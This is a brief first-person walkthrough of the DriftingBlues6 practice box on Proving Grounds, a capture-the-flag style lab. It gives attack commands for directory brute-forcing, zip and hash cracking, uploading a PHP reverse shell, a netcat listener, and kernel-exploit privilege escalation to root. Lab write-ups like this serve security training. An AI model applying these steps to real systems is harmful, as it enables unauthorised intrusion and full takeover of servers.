Hey,
here’s a fast learner’s guide to conquering DriftingBlues6 on Proving Grounds.
Proving Grounds is a fun place to hang out and hack boxes for credit and experience.
This particular box falls under “Warm up” (Newbie level) but it required some great exercises you can use to scale up your skills.
Anyhow:
1. Find open ports tcp/22 and tcp/80. SSH is rarely attackable and usually a distractor so let’s focus on tcp/80.
2. Dig up hidden files with gobuster or dirb, your choice. Both do about the same thing. BTW, you’re advised in evidence to pay attention to ZIP files so….
– gobuster dir -u target -x zip –wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
– PS I usually make an entry into /etc/hosts with the target IP so I can simply refer to the box as ‘target’ instead of an IP Address.
3. This along with http://target.box/robots.txt reveals a useful directory structure.
4. This process revealed a hidden zip file called spammer.zip. It required a password to unzip but it was easily crackable with fcrackzip. fcrackzip brute forces password attempts at zip files, which is awesome. I’d bet there’s such a cracker for password-protected PDF files.
5. Unzipping the zip file after cracking reveals a password hash we can break with $john hash –wordlist=/usr/share/wordlists/rockyou.txt
6. After cracking the hash, you get the username and password to log into the forum URL string we found in robots.txt as http://target.box/textpattern/textpattern
7. Log in, go to Content / Files and upload a php reverse shell. (https://www.revshells.com/) Modify that with your source IP and Port for netcat so it can phone home.
8. nc -nvlp 4444 to open your netcat listener.
9. Call the file from http://target.box/textpattern/files/php-reverse-shell.php and you get a basic shell.
10. Now, uname -a to find the kernel version, check exploit-db.com for c exploit, download and compile with the syntax found in the script comments at the top.
11. chmod +x exploit, then run the exploit.
12. It compromises the box, giving you a chance to change a username (with UID 0) with which you su to root then cat /root/flag.txt for the win!
That was a fun box and a little challenging because dumb little things stopped me from proceeding like using -A with grep to find strings in /etc/passwd. Didn’t make sense but it worked.
Try it,
Greg